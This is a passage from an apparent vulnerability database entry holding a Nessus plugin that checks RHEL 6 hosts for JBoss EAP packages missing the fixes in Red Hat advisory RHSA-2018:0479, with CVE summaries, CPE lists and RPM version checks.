"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jts-idlj", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jts-integration", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-api", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-bridge", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-integration", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-util", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-txframework", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-api", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-bindings", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-common", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-config", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-api", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-impl", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-simple-schema", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-impl", "p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-wildfly8", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-atom-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-cdi", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-client", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-crypto", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson2-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxb-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxrs", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jettison-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jose-jwt", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jsapi", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-json-p-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-multipart-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-spring", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-validator-provider-11", "p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-yaml-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-undertow", "p-cpe:/a:redhat:enterprise_linux:eap7-undertow-jastow", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-elytron", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-client-common", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-ejb-client", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-naming-client", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-transaction-client", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-javadocs", "p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-modules", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-bindings", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-policy", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-common", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-dom", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-policy-stax", "p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-stax", "p-cpe:/a:redhat:enterprise_linux:eap7-xml-security", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2018-0479.NASL", "href": "https://www.tenable.com/plugins/nessus/108323", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:0479. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108323);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2017-12174\", \"CVE-2017-12196\", \"CVE-2017-15089\", \"CVE-2017-15095\", \"CVE-2017-17485\", \"CVE-2017-7561\", \"CVE-2018-1048\", \"CVE-2018-5968\");\n script_xref(name:\"RHSA\", value:\"2018:0479\");\n\n script_name(english:\"RHEL 6 : JBoss EAP (RHSA-2018:0479)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Enterprise Application\nPlatform 7.1 for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform is a platform for Java\napplications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 7.1.1\nserves as a replacement for Red Hat JBoss Enterprise Application\nPlatform 7.1.0, and includes bug fixes and enhancements, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery\n(CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into\ndata cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black\nlist (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black\nlist (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache\npoisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication\n(CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the\nAjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist\n(incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-us/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:0479\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-7561\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15089\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-15095\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1048\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-5968\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-core-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-dto\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hornetq-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hqclient-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jdbc-store\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-journal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-ra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-selector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-service-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-services\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-glassfish-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-entitymanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-envers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-infinispan\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-java8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-cachestore-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-cachestore-remote\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-client-hotrod\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-commons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-spi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-deployers-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-validator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-databind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-datatype-jdk8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-datatype-jsr310\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-jaxrs-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-jaxrs-json-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-module-jaxb-annotations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jackson-modules-java8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4-to-eap7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.0-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.0-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.1-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2-to-eap7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0-to-eap7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0-to-eap7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-jbossws-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-compensations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jbosstxbridge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jbossxts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jts-idlj\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jts-integration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-bridge\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-integration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-restat-util\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-narayana-txframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-config\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-idm-simple-schema\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-picketlink-wildfly8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-atom-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-cdi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-crypto\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jackson2-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxb-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jettison-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jose-jwt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-jsapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-json-p-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-multipart-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-spring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-validator-provider-11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-resteasy-yaml-provider\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-undertow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-undertow-jastow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-elytron\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-client-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-ejb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-naming-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-http-transaction-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wildfly-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-policy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-policy-stax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-wss4j-ws-security-stax\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:eap7-xml-security\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0479\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-cli-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-commons-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-core-client-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-dto-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-hornetq-protocol-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-hqclient-protocol-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-jdbc-store-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-jms-client-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-jms-server-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-journal-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-native-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-ra-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-selector-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-server-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-activemq-artemis-service-extensions-1.5.5.009-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-apache-cxf-3.1.13-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-apache-cxf-rt-3.1.13-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-apache-cxf-services-3.1.13-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-apache-cxf-tools-3.1.13-1.redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-glassfish-jsf-2.2.13-6.SP5_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"eap7-hibernate-5.1.12-1.Final_redhat_1.1.ep7.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", 